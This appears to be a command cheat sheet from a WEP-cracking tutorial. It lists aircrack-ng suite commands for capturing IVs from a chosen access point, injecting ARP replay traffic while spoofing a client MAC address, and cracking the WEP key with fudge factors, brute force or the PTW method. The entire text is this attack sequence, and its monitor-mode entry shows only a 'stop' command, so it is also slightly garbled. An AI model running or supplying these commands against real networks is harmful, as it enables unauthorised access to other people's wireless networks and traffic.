Command Summary
All commands are entered as a single line.
Switching into monitor mode with airmon-ng
airmon-ng stop [WLAN adapter] |
Wireless survey with airodump-ng airodump-ng --ivs --write [capturefile prefix] [WLAN adapter] Wireless survey with airodump-ng 0.9.1 for PTW airodump-ng --write [capturefile prefix] [WLAN adapter] |
IV capture with airodump-ng airodump-ng --ivs --channel [AP channel] --bssid [AP BSSID] --write capturefile [WLAN adapter] IV capture with airodump-ng 0.9.1 for PTW airodump-ng --channel [AP channel] --bssid [AP BSSID] --write capturefile [WLAN adapter] |
aireplay-ng with ARP replay aireplay-ng --arpreplay -b [AP BSSID] -h [client MAC from airodump] [WLAN adapter] |
WEP crack with aircrack-ng aircrack-ng -b [AP BSSID] [capture file(s) name]*.ivs WEP crack with aircrack-ng and fudge factor 4 aircrack-ng -f 4 -b [AP BSSID] [capture file(s) name]*.ivs WEP crack with aircrack-ng, fudge factor 8, brute force last two keybytes aircrack-ng -f 8 -x2 -b [AP BSSID] [capture file(s) name]*.ivs WEP crack with aircrack-ng 0.9.1 and PTW method aircrack-ng -z -b [AP BSSID] [capture file(s) name]*.cap |